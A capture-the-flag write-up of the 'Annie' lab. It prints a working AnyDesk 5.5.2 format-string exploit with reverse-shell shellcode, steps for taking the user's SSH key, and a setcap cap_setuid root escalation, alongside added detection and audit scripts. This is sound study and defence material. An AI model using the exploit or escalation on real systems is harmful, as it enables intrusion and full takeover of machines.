Annie CTF
This lab was relatively simple but taught me a lot of things.
Enumeration
The first thing I like to do is find all the open ports with rustscan and then run nmap on just those ports for further analysis; it makes the scan faster by about 10 minutes. So I ran these commands:
```
rustscan -a $ip -b 65535 -u 5000 | tee rustscan
```
Then I ran nmap on the ports it found:
```
sudo nmap $ip -p xxx,xxx -sV -sC
```
I saw that two ports were open: SSH on 22 and something nmap labelled realserver on 7070.
```
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
7070/tcp open  realserver?
```
Well, this wasn't really enough for me, so I started running nmap scripts, and the first one I ran was something like this:
```
nmap $ip -p 22,7070 --script=safe
```
I found out that 7070 was running AnyDesk, and I was like "Ok, the lab name makes sense now," and I started looking for vulnerabilities in AnyDesk, for example with searchsploit:
```
searchsploit anydesk
----------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                       |  Path
----------------------------------------------------------------------------------------------------- ---------------------------------
AnyDesk 2.5.0 - Unquoted Service Path Privilege Escalation                                           | windows/local/40410.txt
AnyDesk 5.4.0 - Unquoted Service Path                                                                | windows/local/47883.txt
AnyDesk 5.5.2 - Remote Code Execution                                                                | linux/remote/49613.py
AnyDesk 7.0.15 - Unquoted Service Path                                                               | windows/local/51968.txt
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
```
Well, it was not obvious which exploit we needed to run, so I also googled AnyDesk exploits, found an exploit on Exploit-DB, modified it and ran it.
Did I get a reverse shell? Yes, obviously, but I learnt quite a lot in this phase: the port we need to send to is not 7070 but another port AnyDesk uses over UDP, and I generated the shellcode the way the exploit comment tells you to. If you are running into a lot of problems with that exploit version, you can try another exploit from another site, or just copy mine but change the IP and the shellcode.
Note: changes have been made from the original exploit (the `//` comment markers are not valid Python and have been corrected to `#`).
```
# Exploit Title: AnyDesk 5.5.2 - Remote Code Execution
# Date: 09/06/20
# Exploit Author: scryh
# Vendor Homepage: https://anydesk.com/en
# Version: 5.5.2
# Tested on: Linux
# Walkthrough: https://devel0pment.de/?p=1881
import struct
import socket

ip = '10.10.29.248'  # change this to the target IP
port = 50001         # no need to change this, since AnyDesk uses this UDP port for discovery

def gen_discover_packet(ad_id, os, hn, user, inf, func):
    # Build the discovery packet; hostname (hn) and user are length-prefixed fields
    d = b'\x3e\xd1\x01'
    d += struct.pack('>I', ad_id)
    d += struct.pack('>I', 0)
    d += b'\x02' + bytes([os])
    d += struct.pack('>I', len(hn)) + hn
    d += struct.pack('>I', len(user)) + user
    d += struct.pack('>I', 0)
    d += struct.pack('>I', len(inf)) + inf
    d += b'\x00'
    d += struct.pack('>I', len(func)) + func
    d += b'\x02\xc3\x51'
    return d

# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
shellcode = b""  # generate the msfvenom reverse shell payload and replace the shellcode below
shellcode += b"\x48\x31\xc9\x48\x81\xe9\xf6\xff\xff\xff\x48"
shellcode += b"\x8d\x05\xef\xff\xff\xff\x48\xbb\x39\xe2\xbf"
shellcode += b"\x91\x75\x37\x67\xa8\x48\x31\x58\x27\x48\x2d"
shellcode += b"\xf8\xff\xff\xff\xe2\xf4\x53\xcb\xe7\x08\x1f"
shellcode += b"\x35\x38\xc2\x38\xbc\xb0\x94\x3d\xa0\x2f\x11"
shellcode += b"\x3b\xe2\xae\xcd\x7f\x3a\x79\xad\x68\xaa\x36"
shellcode += b"\x77\x1f\x27\x3d\xc2\x13\xba\xb0\x94\x1f\x34"
shellcode += b"\x39\xe0\xc6\x2c\xd5\xb0\x2d\x38\x62\xdd\xcf"
shellcode += b"\x88\x84\xc9\xec\x7f\xdc\x87\x5b\x8b\xd1\xbe"
shellcode += b"\x06\x5f\x67\xfb\x71\x6b\x58\xc3\x22\x7f\xee"
shellcode += b"\x4e\x36\xe7\xbf\x91\x75\x37\x67\xa8"

print('sending payload ...')
p = gen_discover_packet(4919, 1, b'\x85\xfe%1$*1$x%18x%165$ln' + shellcode, b'\x85\xfe%18472249x%93$ln', b'ad', b'main')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(p, (ip, port))
s.close()
print('reverse shell should connect within 5 seconds')
```
This is also copied from Joseph Alan
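As an added, defender-side example (not part of this writeup and not the exploit author's code): a decoder for the discovery packet layout the exploit above builds, plus a check that flags printf-style format specifiers or non-printable bytes in the hostname and user fields, which is what a sensor watching the UDP port the exploit targets would look for. The field names, the bounds checks and the sample values are my assumptions.

```python
import re
import struct
MAGIC, TRAILER = b'\x3e\xd1\x01', b'\x02\xc3\x51'
FMT_SPEC = re.compile(rb'%[0-9$*#+. -]*[a-zA-Z]')  # %x, %18x, %165$ln, %1$*1$x ...

def build_discover(ad_id, os_byte, hostname, user, info, func):
    """Same layout as the exploit's gen_discover_packet; used here only to build samples."""
    lp = lambda b: struct.pack('>I', len(b)) + b          # length-prefixed field
    return (MAGIC + struct.pack('>II', ad_id, 0) + b'\x02' + bytes([os_byte])
            + lp(hostname) + lp(user) + struct.pack('>I', 0) + lp(info) + b'\x00' + lp(func) + TRAILER)

def parse_discover(pkt):
    """Decode a discovery packet into its fields; ValueError if framing or a length field is off."""
    if not (pkt.startswith(MAGIC) and pkt.endswith(TRAILER)):
        raise ValueError('bad magic/trailer')
    body, pos = pkt[len(MAGIC):-len(TRAILER)], 0
    def blob():                     # read one length-prefixed field, bounds-checked
        nonlocal pos
        (n,) = struct.unpack_from('>I', body, pos)
        if pos + 4 + n > len(body):
            raise ValueError('length field overruns packet')
        pos += 4 + n
        return body[pos - n:pos]
    ad_id, _ = struct.unpack_from('>II', body, 0)
    if body[8] != 0x02:
        raise ValueError('bad os marker')
    os_byte, pos = body[9], 10
    hostname, user = blob(), blob()
    pos += 4                        # u32 that is always zero in the builder
    info = blob()
    pos += 1                        # single 0x00 separator
    func = blob()
    return {'ad_id': ad_id, 'os': os_byte, 'hostname': hostname, 'user': user, 'info': info, 'func': func}

def suspicious(pkt):
    """Reasons a packet looks like the format-string attack; empty list means it parsed cleanly."""
    try:
        f = parse_discover(pkt)
    except (ValueError, struct.error, IndexError) as e:
        return [f'malformed: {e}']
    reasons = []
    for name in ('hostname', 'user'):
        if FMT_SPEC.search(f[name]):
            reasons.append(f'{name} contains printf format specifiers')
        if any(b < 0x20 or b > 0x7e for b in f[name]):
            reasons.append(f'{name} contains non-printable bytes')
    return reasons
# Constructed samples: a normal client, and the exploit's field shapes with the shellcode left out.
BENIGN = build_discover(4919, 1, b'workstation-01', b'annie', b'ad', b'main')
HOSTILE = build_discover(4919, 1, b'\x85\xfe%18x%165$ln', b'\x85\xfe%18472249x%93$ln', b'ad', b'main')
```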
Make sure you are running netcat in another tab and the shell will connect back. You can either use that shell or just go to /home/annie/.ssh, where you'll find id_rsa; copy it and save it on your system. After that, get the passphrase; if you don't know how to get the passphrase from an SSH key, do
Once you have the passphrase, connect through SSH with something like:
```
ssh -i key annie@$ip
```
Say yes to the fingerprint prompt and enter the passphrase when asked. Boom, now you are in the shell.
Privilege Escalation
As always, you should look through the common files for any clue, or even look for annie's password in places like .bash_history, or run the env command.
One thing that did work for me was running:
```
find / -perm /4000 2>/dev/null
```
It shows the programs that can run with elevated privileges, like root. And I did find something: it was setcap.
TBH, I didn't know shit about it, but it felt odd, so I looked into it and found this:
```
annie@desktop:~$ find / -perm /4000 2>/dev/null
/sbin/setcap
annie@desktop:~$ cd /tmp
annie@desktop:/tmp$ cp /usr/bin/python3 .
annie@desktop:/tmp$ /sbin/setcap cap_setuid+ep /tmp/python3
annie@desktop:/tmp$ ./python3 -c "import os;os.setuid(0);os.system('/bin/bash')"
root@desktop:/tmp# cd /root/
root@desktop:/root# cat root.txt
[REDACTED FOR GOOD]
root@desktop:/root#
```
Mindfucked? Lemme elaborate
- You are copying Python to `/tmp/` and giving it the ability to change its user ID (via `cap_setuid`).
- This could be used to run commands or scripts with elevated privileges, potentially allowing you to execute code as another user (like `root`).
- Normally, only root or processes with `setuid` privileges can change the user ID of a running process.
- By giving the Python binary the `cap_setuid` capability, you are allowing it to change its user ID (potentially to root) without being a privileged user.
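As an added example (not from the writeup), a small audit that flags the two things this lab's root path depends on: a setuid binary that is not on a known-good list (here `/sbin/setcap`, which being setuid lets any user hand out capabilities) and files carrying identity-changing capabilities such as `cap_setuid`, especially in world-writable locations like `/tmp`. The allow-list, the scratch-directory list and the sample command outputs are constructed assumptions; `audit_live()` runs the same checks on the host it is executed on.

```python
import re
import subprocess

# Capabilities that let a process change identity or bypass permission checks.
# cap_setuid is the one the /tmp/python3 trick above relies on.
DANGEROUS_CAPS = {'cap_setuid', 'cap_setgid', 'cap_dac_override', 'cap_dac_read_search',
                  'cap_sys_admin', 'cap_sys_ptrace', 'cap_sys_module', 'cap_chown', 'cap_fowner'}

# Assumed allow-list of setuid binaries for a stock Ubuntu box; build yours from a
# clean image of the same release and treat anything else as a finding.
EXPECTED_SETUID = {'/usr/bin/passwd', '/usr/bin/sudo', '/usr/bin/su', '/usr/bin/newgrp',
                   '/usr/bin/chsh', '/usr/bin/chfn', '/usr/bin/gpasswd', '/bin/mount', '/bin/umount'}

# Anyone-writable locations where a capability-bearing binary should never live.
SCRATCH_DIRS = ('/tmp/', '/var/tmp/', '/dev/shm/', '/home/')

def parse_getcap(output):
    """Yield (path, set of cap names) from `getcap -r /` output, accepting both the
    older 'path = caps+ep' and the newer 'path caps=ep' line formats."""
    for line in output.splitlines():
        line = line.strip()
        if not line or line.startswith('Failed'):
            continue
        yield line.split()[0], set(re.findall(r'cap_[a-z_]+', line))

def dangerous_cap_files(getcap_output):
    """Return [(path, sorted dangerous caps, in_scratch_dir)] for files worth investigating."""
    findings = []
    for path, caps in parse_getcap(getcap_output):
        hits = caps & DANGEROUS_CAPS
        if hits:
            findings.append((path, sorted(hits), path.startswith(SCRATCH_DIRS)))
    return findings

def unexpected_setuid(find_output, expected=EXPECTED_SETUID):
    """Return setuid paths from `find / -perm -4000 -type f` output that are not on the allow-list."""
    return sorted(p for p in find_output.split() if p not in expected)

def audit_live():
    """Run both checks on this host; getcap ships with libcap, and unreadable dirs are skipped."""
    run = lambda *argv: subprocess.run(argv, capture_output=True, text=True).stdout
    return (unexpected_setuid(run('find', '/', '-perm', '-4000', '-type', 'f')),
            dangerous_cap_files(run('getcap', '-r', '/')))

# Constructed sample outputs mirroring the lab: setcap is setuid, the python3 copy has cap_setuid.
SAMPLE_FIND = "/usr/bin/passwd\n/usr/bin/sudo\n/sbin/setcap\n/usr/bin/su\n"
SAMPLE_GETCAP = ("/usr/bin/ping = cap_net_raw+ep\n"
                 "/tmp/python3 = cap_setuid+ep\n"
                 "/usr/bin/mtr-packet cap_net_raw=ep\n")

if __name__ == '__main__':
    print('setuid not on allow-list:', unexpected_setuid(SAMPLE_FIND))
    print('dangerous capabilities:', dangerous_cap_files(SAMPLE_GETCAP))
```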
I hope now you got it. I'm also a noob in this field, but I try to write writeups to learn myself more than to teach others. Have a good day!!! BTW I hate Elon Musk